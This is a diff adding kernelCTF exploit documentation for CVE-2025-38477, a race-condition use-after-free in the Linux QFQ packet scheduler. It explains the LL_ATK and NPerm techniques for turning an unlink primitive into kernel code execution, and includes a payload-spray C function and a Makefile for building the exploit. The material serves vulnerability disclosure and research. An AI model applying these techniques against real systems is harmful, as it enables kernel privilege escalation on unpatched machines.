google · n132 · Oct 21, 2025
diff --git a/pocs/linux/kernelctf/CVE-2025-38477_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2025-38477_cos/docs/exploit.md
diff --git a/pocs/linux/kernelctf/CVE-2025-38477_cos/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2025-38477_cos/docs/novel-techniques.md
@@ -0,0 +1,265 @@
+From UAF-Unlink to ACE: LL_ATK and NPerm
+===============
+
+By combining academic race-condition techniques, we reliably hit the bug and
+obtain a use-after-free (UAF) on struct `qfq_aggregate`, which is in the
+kmalloc-128 slab:
+
+```c
+struct qfq_aggregate {
+	struct hlist_node          next;                 /*     0  0x10 */
+	u64                        S;                    /*  0x10   0x8 */
+	u64                        F;                    /*  0x18   0x8 */
+	struct qfq_group *         grp;                  /*  0x20   0x8 */
+	u32                        class_weight;         /*  0x28   0x4 */
+	int                        lmax;                 /*  0x2c   0x4 */
+	u32                        inv_w;                /*  0x30   0x4 */
+	u32                        budgetmax;            /*  0x34   0x4 */
+	u32                        initial_budget;       /*  0x38   0x4 */
+	u32                        budget;               /*  0x3c   0x4 */
+	/* --- cacheline 1 boundary (64 bytes) --- */
+	int                        num_classes;          /*  0x40   0x4 */
+
+	/* XXX 4 bytes hole, try to pack */
+
+	struct list_head           active;               /*  0x48  0x10 */
+	struct hlist_node          nonfull_next;         /*  0x58  0x10 */
+
+	/* size: 104, cachelines: 2, members: 13 */
+	/* sum members: 100, holes: 1, sum holes: 4 */
+	/* last cacheline: 40 bytes */
+};
+```
+
+With an agg pointer referencing a freed object, classic strategies include
+same-cache refill (kmalloc-128) or cross-cache exploitation. These are too heavy
+when the race has to be attempted several thousand times and a win can only be
+confirmed after building a UAF-read (e.g., by refilling with a readable struct).
+To win KernelCTF, we designed a much lighter path that starts from a UAF-free
+with an unlink and requires only a KASLR base leak to reach arbitrary code
+execution. It combines two novel techniques: `LL_ATK` and `NPerm`.
+
+## UAF-Unlink
+
+Given an agg pointer to a freed-and-refilled object, we can free the refilled
+object and trigger the unlink in `qfq_destroy_agg`:
+
+
+```c
+static void qfq_destroy_agg(struct qfq_sched *q, struct qfq_aggregate *agg)
+{
+	hlist_del_init(&agg->nonfull_next);
+	q->wsum -= agg->class_weight;
+	if (q->wsum != 0)
+		q->iwsum = ONE_FP / q->wsum;
+
+	if (q->in_serv_agg == agg)
+		q->in_serv_agg = qfq_choose_next_agg(q);
+	kfree(agg);
+}
+```
+
+The unlink action (`hlist_del_init(&agg->nonfull_next)`) provides an
+arbitrary-address unlink primitive:
+
+```c
+static inline void __hlist_del(struct hlist_node *n)
+{
+	struct hlist_node *next = n->next;
+	struct hlist_node **pprev = n->pprev;
+
+	WRITE_ONCE(*pprev, next);
+	if (next)
+		WRITE_ONCE(next->pprev, pprev);
+}
+```
+
+Arbitrary-Address Unlink isn’t common in kernel exploits, but we show it’s
+sufficient for arbitrary code execution (ACE) when paired with our techniques.
+
+Arbitrary-Address Unlink on a kernel heap object (the agg object for
+CVE-2025-38477) means we can trigger the unlink operation (e.g.,
+`hlist_del_init`) and control its parameter (e.g., `agg->nonfull_next`). With a
+UAF, this is straightforward:
+
+- Use the UAF to keep a pointer to a freed kernel heap object
+- Refill the object with payload data (e.g., set `qfq_aggregate->nonfull_next`)
+- Free the object again through the dangling pointer (UAF-free) to trigger the unlink
+- The unlink writes 8 bytes to an arbitrary address
+
+
+So, Arbitrary-Address Unlink gives us an 8-byte arbitrary write. It is not
+arbitrary-length, so it might seem weak, and a heap leak primitive may seem
+necessary to make use of it.
+
+In the following three sections we combine two novel techniques to gain ACE from
+an arbitrary UAF-Unlink without any additional address leak. There are two key
+questions:
+- Where to write (solved by `LL_ATK`)
+- What to write (solved by `NPerm`)
+
+## UAF Unlink Attack Targeting Linked Lists: LL_ATK
+
+
+Idea. While reproducing CVE-2023-4623, I designed `LL_ATK` to resolve the “where
+to write” problem in UAF-unlink exploits. The key is to treat arbitrary-address
+unlink as a way to link an attacker-controlled (refilled) fake node into any
+existing linked list. Once the address of a crafted fake node is written into a
+valid list, legitimate code later iterates that list and invokes function
+pointers embedded in our fake node, which achieves code execution.
+
+
+Example. In our exploit, we splice a fake node into the kernel’s `rtnl_link_ops`
+list. If the fake node’s `kind` field and layout are set properly, the kernel’s
+traversal over `rtnl_link_ops` reaches our node and calls its function pointers.
+Crucially, this path does not require a heap address leak.
+
+```c
+struct rtnl_link_ops {
+	struct list_head           list;                 /*     0  0x10 */
+	const char  *              kind;                 /*  0x10   0x8 */
+	size_t                     priv_size;            /*  0x18   0x8 */
+	struct net_device *        (*alloc)(struct nlattr * *, const char  *, unsigned char, unsigned int, unsigned int); /*  0x20   0x8 */
+	void                       (*setup)(struct net_device *); /*  0x28   0x8 */
+	bool                       netns_refund;         /*  0x30   0x1 */
+
+	/* XXX 3 bytes hole, try to pack */
+
+	unsigned int               maxtype;              /*  0x34   0x4 */
+	const struct nla_policy  * policy;               /*  0x38   0x8 */
+	/* --- cacheline 1 boundary (64 bytes) --- */
+	int                        (*validate)(struct nlattr * *, struct nlattr * *, struct netlink_ext_ack *); /*  0x40   0x8 */
+	int                        (*newlink)(struct net *, struct net_device *, struct nlattr * *, struct nlattr * *, struct netlink_ext_ack *); /*  0x48   0x8 */
+	int                        (*changelink)(struct net_device *, struct nlattr * *, struct nlattr * *, struct netlink_ext_ack *); /*  0x50   0x8 */
+	void                       (*dellink)(struct net_device *, struct list_head *); /*  0x58   0x8 */
+	size_t                     (*get_size)(const struct net_device  *); /*  0x60   0x8 */
+	int                        (*fill_info)(struct sk_buff *, const struct net_device  *); /*  0x68   0x8 */
+	size_t                     (*get_xstats_size)(const struct net_device  *); /*  0x70   0x8 */
+	int                        (*fill_xstats)(struct sk_buff *, const struct net_device  *); /*  0x78   0x8 */
+	/* --- cacheline 2 boundary (128 bytes) --- */
+	unsigned int               (*get_num_tx_queues)(void); /*  0x80   0x8 */
+	unsigned int               (*get_num_rx_queues)(void); /*  0x88   0x8 */
+	unsigned int               slave_maxtype;        /*  0x90   0x4 */
+
+	/* XXX 4 bytes hole, try to pack */
+
+	const struct nla_policy  * slave_policy;         /*  0x98   0x8 */
+	int                        (*slave_changelink)(struct net_device *, struct net_device *, struct nlattr * *, struct nlattr * *, struct netlink_ext_ack *); /*  0xa0   0x8 */
+	size_t                     (*get_slave_size)(const struct net_device  *, const struct net_device  *); /*  0xa8   0x8 */
+	int                        (*fill_slave_info)(struct sk_buff *, const struct net_device  *, const struct net_device  *); /*  0xb0   0x8 */
+	struct net *               (*get_link_net)(const struct net_device  *); /*  0xb8   0x8 */
+	/* --- cacheline 3 boundary (192 bytes) --- */
+	size_t                     (*get_linkxstats_size)(const struct net_device  *, int); /*  0xc0   0x8 */
+	int                        (*fill_linkxstats)(struct sk_buff *, const struct net_device  *, int *, int); /*  0xc8   0x8 */
+
+	/* size: 208, cachelines: 4, members: 26 */
+	/* sum members: 201, holes: 2, sum holes: 7 */
+	/* last cacheline: 16 bytes */
+};
+```
+
+`rtnl_link_ops` holds the callback table for each rtnetlink “link type” (e.g.,
+ipvlan). When userspace asks the kernel to create, modify, or delete an rtnetlink
+device (via `RTM_NEWLINK`, `RTM_DELLINK`, etc.), the kernel scans the global
+linked list of registered `rtnl_link_ops` and selects the entry whose `kind`
+matches the user-provided type (e.g., "ipvlan"). If a UAF-unlink primitive lets
+us splice a forged `rtnl_link_ops` node into that list (with a correctly
+targeted `kind`), subsequent rtnetlink operations dispatch into
+attacker-controlled function pointers, turning the UAF-unlink into arbitrary
+code execution.
+
+
+`LL_ATK` is not limited to `rtnl_link_ops`; it is a general strategy for using a
+UAF-Unlink. It transforms the UAF-Unlink into a fake-node insertion and then
+into arbitrary code execution. Given how widely the kernel uses linked lists, it
+can make exploitation easier for many UAFs (e.g., CVE-2023-4623, where I first
+designed it). It solves the problem of "where to write".
+
+## Leave Payload next to Kernel Resource: `NPerm`
+
+> Note: This is not an exploitation bug per se; we’ve reported it to the kernel
+> hardening team and a patch discussion is ongoing.
+
+In the `LL_ATK` setting, “what to write” is really “where to place the fake
+node.” As mentioned in the previous section, `LL_ATK` does not require a heap
+leak, only a KASLR (kernel base) leak, which is currently not hard to obtain
+with a prefetch side-channel attack. `NPerm` solves the remaining problem:
+placing our payload at an address derived from the kernel base, so no
+additional leak is needed.
+
+
+`NPerm` exploits a long-standing (decades-old) kernel design issue. We (@n132
+and @kyle) identified it in Spring 2025 and reported it to the kernel security
+team. Some maintainers did not consider it a security vulnerability and
+suggested submitting a hardening patch instead. That patch has not yet landed,
+so the issue remains exploitable (e.g., in KernelCTF). We also noticed that
+@XuaizaYa independently described the same behavior in a [recent
+write-up][5], without pinpointing the root cause.
+
+> From our original email to the kernel security team:
+>
+> I am writing to bring to your attention some security vulnerabilities
+> I have discovered. These vulnerabilities allow users to allocate pages
+> mapped to kernel image areas, which would make kernel exploitation
+> easier, considering side-channel attacks.
+>
+> There are mainly 4 regions not removed from kernel image mapping after free:
+> - [rodata_resource.end, data_resource.start]
+> - [__init_begin, __init_end]
+> - [__smp_locks, __smp_locks_end]
+> - [_brk_end, hpage_align(__end_of_kernel_reserve)]
+> User space processes can use mmap to get pages in these areas and
+> leave their ROP chain on these pages so they can pivot the stack to
+> these areas with leaked kernel text base (via side-channel attacks).
+
+The root cause of the `NPerm` issue is that the kernel releases some pages that
+are only used during early boot, but does not unmap them from the kernel
+resource areas. Therefore, if we get these pages back from the page allocator,
+we can still reach them through their still-mapped addresses in those areas.
+
+
+It is easy to use, as shown in the exploit code:
+```c
+#define PAYLOAD_SPRAY_PAGES 0x10
+#define PAGE_SIZE 0x1000
+#define TOTAL_ALLOCATION (PAGE_SIZE * PAYLOAD_SPRAY_PAGES)
+
+void nperm(){
+    // Drain memory to increase chance of getting pages from the target regions.
+    pgvAdd(1, 9, 0x610);
+    for(int i = 0; i < PAYLOAD_SPRAY_PAGES; i++){
+        // PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS
+        void* addr = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+        if(addr == MAP_FAILED)
+            break;
+        memcpy(addr, payload, sizeof(payload)); // Spray payload
+    }
+    pgvDel(1); // Release the memory
+}
+```
+
+We use `pgv` allocations (not necessary, but they make it faster) to drain
+memory and then spray our payload with `mmap`. The payload can then be found in
+the following 4 regions:
+
+- [rodata_resource.end, data_resource.start]
+- [__init_begin, __init_end]
+- [__smp_locks, __smp_locks_end]
+- [_brk_end, hpage_align(__end_of_kernel_reserve)]
+
+
+`NPerm` lets us place our payload at a known address with only a KASLR
+(kernel base) leak, which solves the "what to write" problem.
+
+
+## LL_ATK × NPerm: From UAF-Unlink to Code Execution
+
+
+Combining `LL_ATK` and `NPerm` dramatically simplifies exploitation. In our
+case, once we had a `UAF-Unlink` primitive, the final exploit core (sans
+comments) fit in ~16 lines. The two techniques are independent and reusable:
+`LL_ATK` inserts a fake node into a targeted kernel list; `NPerm` places the fake
+node in a kernel resource area, so no additional kernel heap leak is needed.
+
+Summary: Together, `LL_ATK` + `NPerm` form a generic, practical pathway to
+transform a UAF-Unlink into reliable arbitrary code execution.
+
+
+[5]: https://blog.xmcve.com/2025/09/22/WMCTF2025-Writeup/#title-5
diff --git a/pocs/linux/kernelctf/CVE-2025-38477_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2025-38477_cos/docs/vulnerability.md
@@ -0,0 +1,32 @@
+# Vulnerability
+
+CVE-2025-38477 is a race condition vulnerability in the Linux kernel.
+
+It occurs when `agg` is modified in `qfq_change_agg` (called during
+`qfq_enqueue`) while other threads access it concurrently. Racing it against
+different functions yields different primitives. For example, `qfq_dump_class`
+may trigger a NULL dereference, and `qfq_delete_class` may cause a
+use-after-free.
+
+Easy-to-trigger PoC: https://lore.kernel.org/all/aGIAbGB1VAX-M8LQ@xps/
+
+## Requirements
+- **Capabilities**: `CAP_NET_ADMIN` is required.
+- **Kernel configuration**: `CONFIG_NET_SCHED` and `CONFIG_NET_SCH_QFQ` must be enabled.
+- **User namespaces**: Required to obtain `CAP_NET_ADMIN` if not already available to the user.
+
+## Introduction
+- **Commit**: [462dbc9101ac](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=462dbc9101ac)
+- **Description**: This commit introduced the "Quick Fair Queueing Plus Scheduler" (QFQ+) to the kernel in Linux 3.0-rc1.
+
+## Fix
+- **Commit**: [5e28d5a3f774](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5e28d5a3f774)
+
+## Affected Versions
+- Linux 3.0-rc1 to 6.16-rc6
+
+## Subsystem
+- Net scheduler
+
+## Root Cause
+- Race condition
diff --git a/pocs/linux/kernelctf/CVE-2025-38477_cos/exploit/cos-109-17800.519.32/Makefile b/pocs/linux/kernelctf/CVE-2025-38477_cos/exploit/cos-109-17800.519.32/Makefile
@@ -0,0 +1,54 @@
+# Makefile for CVE-2025-38477 exploit
+
+CC = gcc
+CFLAGS = -static -w
+DBGFLAGS = -g
+TARGET = exploit
+SOURCE = exploit.c
+
+# libx configuration - expects libx to be in ./libx directory
+LIBX_DIR = ./libx
+LIBX_LIB = $(LIBX_DIR)/libx.a
+LIBX_INCLUDE = $(LIBX_DIR)
+
+# Directly link the local static library to avoid conflicts with system libx
+INCLUDES = -I$(LIBX_INCLUDE)
+
+.PHONY: all clean check-libx libx
+
+all: $(LIBX_LIB) $(TARGET)
+
+# Check if libx directory exists
+check-libx:
+	@if [ ! -d "$(LIBX_DIR)" ]; then \
+		echo "Error: libx directory not found at $(LIBX_DIR)!"; \
+		echo "Please ensure libx is present in the current directory"; \
+		exit 1; \
+	fi
+
+# Build libx from local source
+$(LIBX_LIB): check-libx
+	@echo "Building libx..."
+	@$(MAKE) -C $(LIBX_DIR)
+	@echo "libx is ready!"
+
+# Convenience target to just build libx
+libx: $(LIBX_LIB)
+
+$(TARGET): $(SOURCE) $(LIBX_LIB)
+	$(CC) $(CFLAGS) $(INCLUDES) $(SOURCE) -o $(TARGET) $(LIBX_LIB)
+
+
+# Debug build expected by CI workflow
+.PHONY: exploit_debug
+exploit_debug: $(SOURCE) $(LIBX_LIB)
+	$(CC) $(filter-out -s,$(CFLAGS)) $(DBGFLAGS) $(INCLUDES) \
+		$(SOURCE) -o exploit_debug $(LIBX_LIB)
+
+clean:
+	rm -f $(TARGET)
+	rm -f exploit_debug
+	@if [ -d "$(LIBX_DIR)" ]; then \
+		echo "Cleaning libx..."; \
+		$(MAKE) -C $(LIBX_DIR) clean 2>/dev/null || true; \
+	fi
diff --git a/pocs/linux/kernelctf/CVE-2025-38477_cos/exploit/cos-109-17800.519.32/exploit b/pocs/linux/kernelctf/CVE-2025-38477_cos/exploit/cos-109-17800.519.32/exploit